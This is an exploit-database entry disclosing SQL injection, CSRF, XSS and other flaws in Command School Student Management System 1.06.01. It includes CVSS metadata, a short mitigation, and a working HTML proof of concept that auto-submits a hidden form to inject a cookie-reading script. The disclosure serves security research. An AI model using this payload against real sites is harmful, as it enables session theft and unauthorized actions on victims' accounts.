header-logo
Suggest Exploit
vendor:
Command School Student Management System
by:
SecurityFocus
7,5
CVSS
HIGH
Multiple SQL-injection, Cross-Site Request Forgery, Cross-Site Scripting, HTML Injection, Security-Bypass
89,352,79,287,287,264
CWE
Product Name: Command School Student Management System
Affected Version From: 1.06.01
Affected Version To: 1.06.01
Patch Exists: YES
Related CWE: N/A
CPE: a:command_school:command_school_student_management_system
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2014

Command School Student Management System Multiple Vulnerabilities

Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.

Mitigation:

Ensure that all user-supplied input is validated and filtered before being used in the application. Ensure that all output is properly encoded before being returned to the user's browser.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/64707/info
              
Command School Student Management System is prone to the following security vulnerabilities:
              
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
              
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
              
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. 

[CSRF with XSS Exploit]

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://http://www.example.com/sw/add_topic.php">
<input type="hidden" name="topic"
value="<script>alert(document.cookie);</script>" />
<input type="hidden" name="detail" value="Iphobos Blog" />
<input type="hidden" name="Submit" value="Submit" />
</form>
</body>
</html>

Navigation

Suggest Exploit

Services By CQR